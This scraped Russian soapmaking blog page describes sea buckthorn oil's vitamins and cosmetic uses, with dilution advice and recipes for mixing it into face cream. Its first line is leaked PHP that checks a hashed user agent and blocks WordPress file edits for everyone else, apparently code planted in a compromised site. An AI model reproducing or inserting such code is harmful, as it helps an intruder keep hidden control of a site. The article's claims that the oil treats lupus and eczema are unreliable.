if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Облепиховое масло | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Облепиховое масло

Лекарственное растение облепиха еще с давних времен славится своими уникальными и чудодейственными свойствами

Ингредиенты для мыла - облепиховое масло Ингредиенты для мыла - облепиховое масло

Лекар­ствен­ное рас­те­ние обле­пи­ха еще с дав­них вре­мен сла­вит­ся сво­и­ми уни­каль­ны­ми и чудо­дей­ствен­ны­ми свойствами.

Осо­бо цен­ны­ми счи­та­ют­ся пло­ды обле­пи­хи, из мяко­ти и семян кото­рых, как ока­за­лось, мож­но отжи­мать мас­ло, обла­да­ю­щее не мень­шей полез­но­стью, и широ­ко при­ме­ня­е­мое как в меди­цин­ских, так и в кос­ме­то­ло­ги­че­ских целях, в част­но­сти для изго­тов­ле­ния мыла руч­ной работы.

Полу­чен­ное обле­пи­хо­вое мас­ло име­ет жид­кую кон­си­стен­цию, яркий оран­же­во-крас­ный отте­нок, и весь­ма бога­тый состав вита­ми­нов, и мно­гих дру­гих полез­ных веществ. Это и вита­мин A, кото­рым осо­бен­но бога­то это мас­ло, и кото­рый отве­ча­ет за увлаж­не­ние и эла­стич­ность кожи. Вита­мин E, про­дле­ва­ю­щий моло­дость кожи. Не менее важ­ный для кожи вита­мин C, спо­соб­ству­ю­щий повы­ше­нию и сохра­не­нию ее упру­го­сти, и неко­то­рые дру­гие вита­ми­ны (B, K,P), игра­ю­щие так­же нема­ло­важ­ную роль в под­дер­жа­нии кра­со­ты и здо­ро­вья нашей кожи лица.

Кро­ме того, обле­пи­хо­вое мас­ло содер­жит каро­ти­ны, каро­ти­но­и­ды, токо­фе­ро­лы, сте­ро­лы, жир­ные кис­ло­ты. Спи­сок веществ мож­но про­дол­жать еще дол­го. Про­ще будет ска­зать, что бла­го­да­ря всем вхо­дя­щим в состав мас­ла ком­по­нен­там, оно явля­ет­ся пре­крас­ным сред­ством по ухо­ду за сухой, увя­да­ю­щей, и про­блем­ной кожей лица.

Кос­ме­ти­че­ские свой­ства обле­пи­хо­во­го масла

В част­но­сти мас­ло обле­пи­хи реко­мен­ду­ет­ся при сухой коже лица, неред­ко стра­да­ю­щей от огру­бе­ния и шелу­ше­ния. Обла­дая заме­ча­тель­ным смяг­ча­ю­щим, увлаж­ня­ю­щим и пита­тель­ным дей­стви­ем, мас­ло так­же предот­вра­ща­ет пер­вые при­зна­ки ста­ре­ния кожи, и обра­зо­ва­ние ран­них морщин.

Эффек­тив­но при­ме­не­ние обле­пи­хо­во­го мас­ла и при нару­шен­ной пиг­мен­та­ции кожи. Напри­мер, с его помо­щью мож­но суще­ствен­но освет­лить вес­нуш­ки и дру­гие раз­лич­ные пиг­мент­ные пят­на. Кро­ме того, обле­пи­хо­вое мас­ло для лица может при­ме­нять­ся как наруж­ное сред­ство для лече­ния повре­жде­ний кожи (ожо­ги, раны, поре­зы, тре­щи­ны) и мно­гих кож­ных болез­ней (дер­ма­ти­ты, экзе­ма, вол­чан­ка, пиодер­мия, чешуй­ча­тый лишай), вклю­чая угре­вую сыпь.

Поми­мо все­го про­че­го, обле­пи­хо­вое мас­ло может исполь­зо­вать­ся в ухо­де за губа­ми, кожей вокруг глаз, а так­же для укреп­ле­ния и пита­ния ресниц.

Наружное применение облепихового масла

В отли­чие от мно­гих дру­гих нату­раль­ных кос­ме­ти­че­ских масел, обле­пи­хо­вое мас­ло для лица не реко­мен­ду­ет­ся исполь­зо­вать в чистом нераз­бав­лен­ном виде. Это свя­за­но с тем, что оно содер­жит доста­точ­но высо­кий про­цент каро­ти­на, кото­рый может повли­ять на чув­стви­тель­ность кожи, и ослаб­ле­ние ее защит­но­го барьера.

Чистое мас­ло обле­пи­хи мож­но при­ме­нять лишь при болез­нях и повре­жде­ни­ях кожи, сма­зы­вая им толь­ко пора­жен­ные участ­ки. Так­же неболь­шим коли­че­ством обле­пи­хо­во­го мас­ла мож­но сма­зы­вать име­ю­щи­е­ся на лице и теле вес­нуш­ки и пиг­мент­ные пят­на, или сухие, потрес­кав­ши­е­ся и обвет­рен­ные губы.

Очень важ­ным хочет­ся отме­тить то, что для ухо­да за кожей лица под­хо­дит толь­ко мас­ло, полу­чен­ное мето­дом холод­но­го отжи­ма (virgin). Мас­ло обле­пи­хи, полу­чен­ное мето­дом холод­ной экс­трак­ции, исполь­зо­вать для этой цели крайне не рекомендуется!

При сухой, увя­да­ю­щей и про­блем­ной коже, на кото­рой име­ют­ся раз­но­го рода угри и пры­щи, обле­пи­хо­вое мас­ло хоро­шо добав­лять в крем для лица, кото­рым вы еже­днев­но поль­зу­е­тесь. Самый удоб­ный вари­ант – это выда­вить на руку разо­вую часть кре­ма, кото­рую вы соби­ра­е­тесь исполь­зо­вать, доба­вить 2–3 кап­ли мас­ла обле­пи­хи, и сра­зу же нане­сти смесь на лицо. Так­же 1 кап­лю мас­ла мож­но добав­лять на разо­вую часть кре­ма или геля для кожи вокруг глаз, или нано­сить капель­ку чисто­го мас­ла на рес­ни­цы. Или же обле­пи­хо­вое мас­ло мож­но сме­ши­вать с дру­ги­ми рас­ти­тель­ны­ми мас­ла­ми, кото­рые вы исполь­зу­е­те вме­сто кре­ма, в про­пор­ци­ях при­мер­но 1:4.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!